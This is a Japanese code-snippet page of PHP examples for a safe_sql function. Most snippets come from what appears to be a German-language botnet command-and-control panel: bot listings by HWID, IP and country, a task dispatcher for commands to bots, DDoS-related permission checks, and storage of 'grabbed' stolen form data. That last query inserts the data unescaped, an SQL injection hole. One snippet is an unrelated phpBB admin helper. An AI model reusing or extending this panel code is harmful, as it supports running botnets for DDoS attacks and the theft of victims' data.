safe_sql PHPのコード例

コード例 #1

0

ファイルを表示

ファイル: visit.php プロジェクト: sucof/footlocker

function get_top20($limit){
$query1 = mysql_query("SELECT COUNT(*) AS count FROM bots");
				
while($row = mysql_fetch_array($query1)){
	$alle = $row[count];
}

if($limit){
	$query2 = mysql_query("SELECT * FROM bots GROUP BY country HAVING count(country) >= 1 ORDER BY count(country) DESC LIMIT 0,10");
}else{
	$query2 = mysql_query("SELECT * FROM bots GROUP BY country HAVING count(country) >= 1 ORDER BY count(country) DESC LIMIT 10,20");
}

$array = array();

while($row = mysql_fetch_array($query2)){
	$country = safe_xss($row['country']);
	$query3  = mysql_query("SELECT COUNT(*) AS count FROM bots WHERE country = '".safe_sql($country)."'");
													
	while($row = mysql_fetch_array($query3)){
		$zahl = safe_xss($row['count']);
								
		array_push($array,$zahl);

		$gesamt = $alle;
		$total  = safe_xss($zahl/$gesamt*100);
							
		if(!empty($country)){
			$countries .= '<label style="display: inline-block; width: 2em;"><img src="../img/flags/'.safe_xss($country).'.gif" OnClick="add(\''.safe_xss($country).',\');" /></label>';
		}
	}
};

return $countries;
}

コード例 #2

0

ファイルを表示

ファイル: rechte.php プロジェクト: sucof/footlocker

function profil_rechte($was){
	if(!$_SESSION['admin']){
		$user = $_SESSION['secuser'];
		$ddos_abfrage = mysql_query("SELECT * FROM users WHERE user = '******' AND rechte LIKE '%".safe_sql($was)."%'");
			
		if(mysql_num_rows($ddos_abfrage)){
			return true;
		}
	}
}

コード例 #3

0

ファイルを表示

ファイル: befehle.php プロジェクト: sucof/footlocker

if(isset($_GET['cmd'])){
	$cmd = safe_xss($_GET['cmd']);

	mysql_query("DELETE FROM tasks WHERE command = '".safe_sql($cmd)."'");
	mysql_query("DELETE FROM tasks_done WHERE command = '".safe_sql($cmd)."'");
	
	echo '<meta http-equiv="refresh" content="0; URL=befehle.php">'; 
}	

if(isset($_GET['deletetasks'])){
	if(safe_xss($_GET['del']) == '1'){
		$query = mysql_query("SELECT id FROM tasks WHERE bots = done");
		while($row = mysql_fetch_array($query)){
		  $id = safe_xss($row['id']);
		  $result1 = mysql_query("DELETE FROM tasks WHERE id = '".safe_sql($id)."'");
		  $result2 = mysql_query("DELETE FROM tasks_done WHERE id = '".safe_sql($id)."'");
		}
		
		if(!$result1 || !$result2){
			die('<script>alert("Fehler - Kein Task beendet?");</script>
			  <meta http-equiv="refresh" content="0; URL=befehle.php">');
		}else{
			echo '<script>alert("Erfolgreich entfernt");</script>
			  <meta http-equiv="refresh" content="0; URL=befehle.php">';
		}
	}
	
	if($_GET['del'] == '2'){
		$result1 = mysql_query("DELETE FROM tasks");
		$result2 = mysql_query("DELETE FROM tasks_done");

コード例 #4

0

ファイルを表示

ファイル: bots.php プロジェクト: sucof/footlocker

	
echo '<h3>Deine Bots</h3>
	 <table>
	  <tr>
		<th>ID</th>
		<th>Land</th>
		<th>Name@HWID@IP Adresse</th>
		<th>Installiert</th>
		<th>Letzte Verbindung</th>
		<th>Status</th>
	  </tr>';

$query1 = mysql_query("SELECT COUNT(*) FROM bots");
$item_count = mysql_result($query1, 0);
$nav = new PageNavigation($item_count, 50);
$query1 = mysql_query("SELECT * FROM bots ORDER BY id ASC LIMIT ".safe_sql($nav->sql_limit));
$item_number = $nav->first_item_id;

  //$query1 = mysql_query("SELECT * FROM bots");
while($row = mysql_fetch_array($query1)){
  $hwid	 = safe_xss($row['hwid']);
  $status = safe_xss($row['status']);
	  
echo '<tr>
	  <td style="">'.safe_xss($row['id']).'</td>';
		if(empty($row['country'])){
			echo '<td style=""><img src="img/flags/00.gif" /></td>';
		}else{
			echo '<td style=""><img src="img/flags/'.safe_xss($row['country']).'.gif" />&nbsp;'.$options[strtoupper(safe_xss($row['country']))].'</td>';
		}

コード例 #5

0

ファイルを表示

ファイル: login.php プロジェクト: sucof/footlocker

	require_once('inc/config.php');
	require_once('other/safe.php');
	
	if($_SESSION['seclogin']) { header('Location: index.php'); exit(); }

	if(isset($_POST['login'])){
		$user = $_POST['user'];
		$pass = sha1(md5(safe_xss($_POST['pass'])));
		
		$exist = mysql_query("SELECT * FROM users WHERE user = '******' AND pw = '".safe_sql($pass)."'");
		
		if(mysql_num_rows($exist)){
			$_SESSION['seclogin'] = true;
			$_SESSION['secuser'] = $user;
			
			$q = mysql_query("SELECT * FROM users WHERE user = '******' AND pw = '".safe_sql($pass)."'");
			while($row = mysql_fetch_array($q))
			{
			  if($row['admin'] == '1'){
				$_SESSION['admin'] = true;
			  }
			}
			
			$error = '<img src="img/accept.png" />&nbsp;Bitte warten...<meta http-equiv="refresh" content="3; URL=index.php">';
		}else{
			$error = '<img src="img/del.png" />&nbsp;Fehlgeschlagen';
		}
	}
?>

<link rel="stylesheet" type="text/css" href="css/style.css"/>

コード例 #6

0

ファイルを表示

ファイル: showall.php プロジェクト: sucof/footlocker

<style type="text/css">
	body{
		font-size: 11px;
		font-family: Tahoma;
	}
	
	label{
		display: inline-block;
		width: 14em;
	}
</style>

<?php
require_once('../inc/config.php');
	require_once('../other/safe.php');
	require_once('../other/code2country.php');
	
	$id = safe_xss($_GET['id']);
	
	$query1 = mysql_query("SELECT * FROM tasks WHERE id = '".safe_sql($id)."'");
	while($row = mysql_fetch_array($query1))
	{
		 $split = explode(',', safe_xss($row['countries']));
		  
	
		for($i = 0; $i <= count($split)-2; $i++){
			echo '<img src="../img/flags/'.$split[$i].'.gif" />&nbsp;'.$options[strtoupper($split[$i])].'<br />';
		}

	}
?>

コード例 #7

0

ファイルを表示

ファイル: top20countries.php プロジェクト: sucof/footlocker

		<th>Bots</th>
	    <th>Prozent</th>
	  </tr>';

$query1 = mysql_query("SELECT COUNT(*) AS count FROM bots");

while($row = mysql_fetch_array($query1)){
	$alle = safe_xss($row[count]);
}

$query2 = mysql_query("SELECT * FROM bots GROUP BY country HAVING count(country) >= 1 ORDER BY count(country) DESC LIMIT 20");
						
$array = array();
while($row = mysql_fetch_array($query2)){
$country = safe_xss($row['country']);
$query3  = mysql_query("SELECT COUNT(*) AS count FROM bots WHERE country = '".safe_sql($country)."'");
							
while($row = mysql_fetch_array($query3)){
	$zahl = safe_xss($row['count']);								
	array_push($array,$zahl);
	$gesamt = $alle;
	$total  = safe_xss($zahl/$gesamt*100);

	if($country == ''){
		echo '<tr><td><img src="img/flags/00.gif" /></td><td>'.safe_xss($zahl).'</td><td>'.safe_xss(round($total, 1))."%</td></tr>";
	}else{
		echo '<tr><td><img src="img/flags/'.safe_xss($country).'.gif" /></td><td>'.safe_xss($zahl).'</td><td>'.safe_xss(round($total, 1)).'%</td></tr>';
	}
}
}

コード例 #8

0

ファイルを表示

ファイル: adduser.php プロジェクト: sucof/footlocker

if(!$_SESSION['admin']){
	echo 'Keine Berechtigung!';
	exit();
}

if(isset($_POST['adduser'])){
	if($_POST['token'] !== $_SESSION['token3']){
		echo 'Token falsch';
		exit();
	}else{
		$user_add = safe_xss($_POST['user']);
		$pass_add = safe_xss(sha1(md5($_POST['pass'])));
		$rechte_add = safe_xss($_POST['rechte']);
		$admin_add = safe_xss($_POST['admin']);

		mysql_query("INSERT INTO users (user, pw, rechte, admin) VALUES ('".safe_sql($user_add)."', '".safe_sql($pass_add)."', '".safe_sql($rechte_add)."', '".safe_sql($admin_add)."')");
		
		echo 'Bitte warten... <meta http-equiv="refresh" content="2; URL=benutzer.php">';
	}
}else{
	$_SESSION['token3'] = uniqid(md5(microtime()), true);
	?>
	<form action="adduser.php" method="post">
	  <b>Benutzer</b><p><input type="text" name="user" /></p>
	  <b>Passwort</b><p><input type="pass" name="pass" /></p>
	  <b>Rechte</b><p><input type="text" name="rechte" value="z.B http,tcp,dlex" /></p>
	  <input type="hidden" name="token" value="<?php echo $_SESSION['token3']; ?>" />
	  
	  <br />
	  <input type="radio" name="admin" value="1" />Administrator
	  <input type="radio" name="admin" value="0" />Eingeschr&auml;nkter Benutzer<br />

コード例 #9

0

ファイルを表示

ファイル: connect.php プロジェクト: sucof/footlocker

               
                    $q2 = mysql_query("SELECT * FROM tasks WHERE command = '".safe_sql($command)."'");
                        while($row = mysql_fetch_array($q2))
                         {
                            $done = safe_xss($row['done']);
                            $bots = safe_xss($row['bots']);
                            $add  = $done+1;
                         }
                         
                        if($done != $bots){
                            $q3    = "SELECT * FROM tasks_done WHERE hwid = '".safe_sql($hwid)."' AND command = '".safe_sql($command)."'";
                            $count = mysql_query($q3);
                   
                            if(!mysql_num_rows($count)){                                
                                echo '$'.$command.'$';
                               
                                mysql_query("UPDATE tasks Set done = '$add' WHERE command = '".safe_sql($command)."'");            
                                mysql_query("INSERT INTO tasks_done
                                         (hwid, command) VALUES
                                         ('".safe_sql($hwid)."', '".safe_sql($command)."')");
                            }
                        }                    
            }
        }
    }else{
        $string = $_POST['grabbed'];
        $tra = str_replace('3D', '', urldecode($string));
        mysql_query("INSERT INTO grabberlogs (string) VALUES ('$tra')");
    }
    ?>

コード例 #10

0

ファイルを表示

ファイル: top10yesterday.php プロジェクト: sucof/footlocker

		<th>Percent</th>
	   </tr>
	  <tr>';
									  
$query1 = mysql_query("SELECT COUNT(*) AS count FROM bots WHERE install LIKE '%$yesterday%'");
						
while($row = mysql_fetch_array($query1)){
	$alle = safe_xss($row[count]);
}
					
$query2 = mysql_query("SELECT * FROM bots WHERE install LIKE '%$yesterday%' GROUP BY country HAVING count(country) >= 1 ORDER BY count(country) DESC LIMIT 10");
						
$array = array();
while($row = mysql_fetch_array($query2)){
$country = safe_xss($row['country']);
$query3  = mysql_query("SELECT COUNT(*) AS count FROM bots WHERE country = '".safe_sql($country)."' AND install LIKE '%$yesterday%'");
															
while($row = mysql_fetch_array($query3)){
	$zahl = safe_xss($row['count']);
									
	array_push($array,$zahl);
	$gesamt = $alle;
	$total  = safe_xss($zahl/$gesamt*100);

	if($country == ''){
		echo '<tr><td><img src="img/flags/00.gif" /></td><td>'.safe_xss($zahl).'</td><td>'.safe_xss($round($total, 1))."%</td></tr>";
	}else{
		echo '<tr><td><img src="img/flags/'.safe_xss($country).'.gif" /></td><td>'.safe_xss($zahl). '</td><td>'.safe_xss(round($total, 1)).'%</td></tr>';
	}
}
}

コード例 #11

0

ファイルを表示

ファイル: toolkit.php プロジェクト: damncabbage/publicwhip

function delete_user($user_id, $clear_posts = false, $retain_pms = false, $from = 'index')
{
    // Debugging info:
    // var_dump( $user_id );
    // var_dump( $clear_posts );
    // var_dump( $retain_pms );
    // var_dump( $from );
    // Set global variables
    global $index;
    global $phpbb_version;
    global $phpbb_banlist;
    global $phpbb_user_group;
    global $phpbb_users;
    global $phpbb_groups;
    global $phpbb_posts;
    global $phpbb_posts_text;
    global $phpbb_topics;
    global $phpbb_vote_voters;
    global $phpbb_auth_access;
    global $phpbb_sessions;
    global $phpbb_sessions_keys;
    global $phpbb_privmsgs;
    global $phpbb_privmsgs_text;
    global $phpbb_topics_watch;
    // Set redirect URL
    if ($from == 'edit') {
        $from = "{$index}?user_id={$user_id}";
    } else {
        $from = $index;
    }
    // First, check if we are dealing with a single user, or an array of users
    if (is_array($user_id)) {
        // Create user counter variable
        $user_counter = 0;
        // Loop through the array and perform security checks
        // on each element before actually deleting anything
        foreach ($user_id as $id) {
            //user_id foreach
            // First things first, sanitize the $user_id
            $user_id = safe_sql($id);
            //
            // Obtain username and level based on user_id
            //
            $sql = "SELECT * FROM {$phpbb_users} WHERE user_id={$id} LIMIT 1";
            $result = mysql_query($sql);
            $myrow = mysql_fetch_array($result);
            $username = safe_sql($myrow['username']);
            $user_level = safe_sql($myrow['user_level']);
            // Obtain first admin account to set as group mod if deleted user is a group mod (step 5)
            $sql = "SELECT * FROM {$phpbb_users} WHERE user_level=1 ORDER BY user_id ASC LIMIT 1";
            $result = mysql_query($sql);
            $myrow = mysql_fetch_array($result);
            $admin_id = safe_sql($myrow['user_id']);
            // Debug info:
            // echo '<pre>';
            // echo gettype( $myrow );
            // die( $admin_id );
            // Check if admin account exists before deleting, if not return with error
            if (!is_array($myrow)) {
                $_SESSION['errors']['edituser'][] = 'Due to the phpbb table requirements, at least one admin must exist in the database before a user can be deleted.<br />Either promote a current user to an admin, or register a new one give it admin status.';
                header("Location: {$from}");
                die;
            }
            // Check if attempting to delete the anonymous account
            if ($id == -1) {
                $_SESSION['errors']['edituser'][] = 'The anonymous account is required for phpbb to function correctly and cannot be deleted.';
                continue;
            }
            // Check if attempting to delete an admin account
            if ($user_level == 1) {
                // Check to see if delete admin error has occured to prevent duplicate additions of the admin notification
                // This way it will only list the delete error reason, then list only the admin account names on additional admin delete calls
                if (!isset($admin_delete_error)) {
                    $_SESSION['errors']['edituser'][] = "You cannot delete administrator accounts, they must first be demoted to a user.";
                    $admin_delete_error = true;
                }
                $_SESSION['errors']['edituser'][] = "<b>{$username}</b> is an administrator and therefore has been skipped.";
                continue;
            }
            // This line calls the delete user core function which actually deletes the user
            delete_user_core($id, $clear_posts, $retain_pms);
            $user_counter++;
        }
        //user_id foreach
        $_SESSION['errors']['edituser'][] = "{$user_counter} user(s) deleted successfully.";
    } else {
        // First things first, sanitize the $user_id
        $user_id = safe_sql($user_id);
        //
        // Obtain username and level based on user_id
        //
        $sql = "SELECT * FROM {$phpbb_users} WHERE user_id={$user_id} LIMIT 1";
        $result = mysql_query($sql);
        $myrow = mysql_fetch_array($result);
        $username = safe_sql($myrow['username']);
        $user_level = safe_sql($myrow['user_level']);
        // Obtain first admin account to set as group mod if deleted user is a group mod (step 5)
        $sql = "SELECT * FROM {$phpbb_users} WHERE user_level=1 ORDER BY user_id ASC LIMIT 1";
        $result = mysql_query($sql);
        $myrow = mysql_fetch_array($result);
        $admin_id = safe_sql($myrow['user_id']);
        // Debug info:
        // echo '<pre>';
        // echo gettype( $myrow );
        // die( $admin_id );
        // Check if admin account exists before deleting, if not return with error
        if (!is_array($myrow)) {
            $_SESSION['errors']['edituser'][] = 'Due to the phpbb table requirements, at least one admin must exist in the database before a user can be deleted.<br />Either promote a current user to an admin, or register a new one give it admin status.';
            header("Location: {$from}");
            die;
        }
        // Check if attempting to delete the anonymous account
        if ($user_id == -1) {
            $_SESSION['errors']['edituser'][] = 'The anonymous account is required for phpbb to function correctly and cannot be deleted.';
            header("Location: {$from}");
            die;
        }
        // Check if attempting to delete an admin account
        if ($user_level == 1) {
            $_SESSION['errors']['edituser'][] = "You cannot delete administrator accounts, they must first be demoted to a user.<br /><b>{$username}</b> is an administrator and therefore has been skipped.";
            header("Location: {$from}");
            die;
        }
        // This line calls the delete user core function which actually deletes the user
        delete_user_core($user_id, $clear_posts, $retain_pms);
        $_SESSION['errors']['edituser'][] = "The user <b>{$username}</b> was deleted successfully.";
    }
    //
    // Original delete quries were here, they have been moved to the delete_user_core() function
    //
    return true;
}

コード例 #12

0

ファイルを表示

ファイル: benutzer.php プロジェクト: sucof/footlocker

if(isset($_GET['delid'])){

$id = safe_xss($_GET['delid']);

if($_GET['token'] !== $_SESSION['token']){
    echo 'Token falsch';
	exit();
}else{
	mysql_query("DELETE FROM users WHERE id = '".safe_sql($id)."'");
}
}else if(isset($_GET['editid'])){

$_SESSION['token2'] = uniqid(md5(microtime()), true);
$id = safe_xss($_GET['editid']);
	
$auslesen = mysql_query("SELECT * FROM users WHERE id = '".safe_sql($id)."'");
while($row = mysql_fetch_array($auslesen)){
	$user_e = safe_xss($row['user']);
	$user_r = safe_xss($row['rechte']);
    $user_a = safe_xss($row['admin']);
}
	
echo '<form action="other/edit.php" method="post">
		Benutzer: <input type="text" name="user_e" value="'.safe_xss($user_e).'" />
		Rechte: <input type="text" name="user_r" value="'.safe_xss($user_r).'" />
		Gruppe: <input type="text" id="gruppe" name="user_a" value="'.$user_a.'" />&nbsp;('.safe_xss(admin($user_a)).') <input type="submit" name="editieren" value="Editieren" />
		<input type="hidden" name="token" value="'.$_SESSION['token2'].'" />
		<input type="hidden" name="id" value="'.safe_xss($id).'" />
		<p><b>Zum &auml;ndern entweder <b>1</b> (F&uuml;r Admin Rechte) oder 0 (F&uuml;r User) schreiben bei Gruppe</b></p>
	   </form>';
}else{

PHP safe_sqlの例